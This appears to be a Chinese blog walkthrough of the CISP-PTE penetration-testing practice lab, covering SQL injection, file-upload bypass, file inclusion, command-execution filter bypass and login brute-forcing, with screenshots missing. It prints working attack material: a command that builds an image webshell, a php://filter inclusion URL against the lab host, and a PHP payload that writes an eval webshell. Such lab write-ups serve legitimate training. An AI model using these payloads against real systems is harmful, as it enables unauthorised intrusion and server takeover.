CISP-PTE 靶场攻略+笔记

目录

第一关,SQL注入

展示效果

判断字段数

使用load_file()可以查看到本地的文件

第二关,文件上传

制作图片🐎

访问🐎上传的url地址

shell连接

第三关,文件包含漏洞

​编辑

发现key.php

尝试伪协议注入

简单粗暴,接下来就是base64解码

也可以使用input协议

写入payload

第四关,命令执行

payload构造

开始尝试

检查源码

第五关,日志分析

尝试爆破

登录成功


第一关,SQL注入

%0a:表示一个空格

%23:表示一个#号(#号的作用是注释掉后面的内容

展示效果

判断字段数

判断出字段数为4

使用联合查询union select 进行下一步

好小子,居然还有过滤

怎么绕过可以参考这个文章

发现套娃的方式可以绕过

使用load_file()可以查看到本地的文件

如果有小伙伴跟我刚开始一样不明白为什么知道这个路径还有文件存放的位置,你可以看看home页

第二关,文件上传

可以看见jpg格式可以上传成功,我们尝试写一个图片🐎

制作图片🐎

copy /b 123.jpg+info.php shell.jpg

文件上传绕过文章

成功绕过,猜测是黑名单

访问🐎上传的url地址

shell连接

测试了一堆,发现就这个可以连接🤷‍♂️

开始找文件咯

第三关,文件包含漏洞

能看见passwd文件

发现key.php

问题,怎么看见这个里面的内容?

参考这篇文章

尝试伪协议注入

http://192.168.100.20:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

简单粗暴,接下来就是base64解码

也可以使用input协议

这里看见可以写入

写入payload

<?php fputs(fopen('shell.php', 'w'),'<?php eval($_POST[xxx]); ?>'); ?>

第四关,命令执行

payload构造

参考文献

开始尝试

命令中间加\可以绕过

中间加$1可以绕过 

就不一一尝试了,够用就行

检查源码

第五关,日志分析

发现了login

尝试爆破

发现密码是password123

登录成功

评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值